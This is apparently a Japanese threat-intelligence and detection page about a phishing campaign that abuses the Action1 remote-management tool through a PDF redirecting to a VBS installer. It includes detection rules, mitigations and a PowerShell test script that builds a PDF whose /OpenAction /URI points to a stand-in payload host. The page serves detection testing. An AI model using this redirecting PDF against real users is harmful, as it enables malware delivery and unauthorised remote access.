アクティブな脅威キャンペーンでRMMツールの悪用が続々と拡大
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
脅威アクターは、特にAction1を使用してリモート管理および監視(RMM)ツールを悪用し、侵害された環境内に永続的なアクセスを確立しています。攻撃は、被害者をVBSファイルにリダイレクトする悪意のあるPDFを含むフィッシングメールから始まります。このスクリプトは、その後、正当なAction1エージェントを含むMSIパッケージをダウンロードしてインストールし、不正なリモートアクセスを可能にします。
調査
調査により、OpenActionおよびURIキーワードを悪用し、VercelにホストされたURLからダウンロードを開始する悪意のあるPDFが発見されました。取得されたMSIパッケージの解析により、ベンダー自身のクラウドインフラストラクチャを通じて不正利用されている正当なAction1 Corporationファイルが明らかになりました。インストールされたエージェントは特定のCustomerIDを含み、正当なAction1ドメインと通信します。
緩和策
組織は、OpenActionまたはURIキーワードを含む疑わしいPDF構造を識別するためにメールフィルタリングを構成する必要があります。セキュリティチームは、不正なRMMツールのインストールやA1Agentサービスの作成を監視する必要があります。予期しないRMMクラウドインフラストラクチャへの接続をブロックし、異常または不正なCustomerIDを特定することで、リモートアクセスの不正利用リスクをさらに軽減することができます。
対応
悪意のあるRMMアクティビティが検出された場合、追加のリモートコマンド実行を防ぐために影響を受けたホストを隔離します。フィッシングメールの送信元を調査し、関連するVBSおよびMSIファイルのフォレンジック分析を実施します。潜在的に侵害された資格情報を取り消し、不正なリモートアクセスや永続性の指標を確認するためにAction1エージェントの構成を見直します。
攻撃フロー
この部分をまだ更新しています。
検出
LOLBAS WScript / CScript(プロセス作成経由)
代替リモートアクセス/管理ソフトウェア(プロセス作成経由)
サードパーティサービス/ツールを介したデータ侵入/流出/C2の可能性(プロキシ経由)
サードパーティサービス/ツールを介したデータ侵入/流出/C2の可能性(DNS経由)
リモートアクセスソフトウェアのドメイン通信試みによる指令統制活動の可能性(DNS経由)
IOCs (HashSha256) を検出:野にあるさらなるRMMツール
Action1企業サーバーへのリモート接続 [Windowsネットワーク接続]
悪意のあるVBSへのPDF OpenActionおよびURIリダイレクト [Windowsファイルイベント]
シミュレーション実行
-
攻撃のストーリーとコマンド: 敵対者はフィッシングキャンペーンをシミュレートしています。目的は、
Transaction Receipt.pdfという名前のファイルを被害者に届けることです。このPDFは特別に作成されており、ユーザーが開くとすぐに/OpenActionコマンドが/URIリダイレクトをトリガーします。このリダイレクトは、悪意のあるVBScriptを提供するサイトにユーザーを導くために設計されています。提供された特定の検出ルールをトリガーするために、正確な名前と内部文字列を必要とするファイルを作成します。 -
回帰テストスクリプト:
# シミュレーションスクリプト: PDF OpenAction検出のトリガー $targetFile = "$env:USERPROFILEDesktopTransaction Receipt.pdf" # 検出キーワードに一致する「悪意のある」PDF内容を作成 $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # 'file_event'検出をトリガーするためにファイルをディスクに書き込み $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "シミュレーションファイルが作成されました: $targetFile" Write-Host "SIEMで検出アラートを確認してください。" -
クリーンアップコマンド:
# クリーンアップ: シミュレートされた悪意のあるファイルを削除 $targetFile = "$env:USERPROFILEDesktopTransaction Receipt.pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "クリーンアップ完了: $targetFile を削除しました。" } else { Write-Host "クリーンアップ: ファイルが見つかりません。" }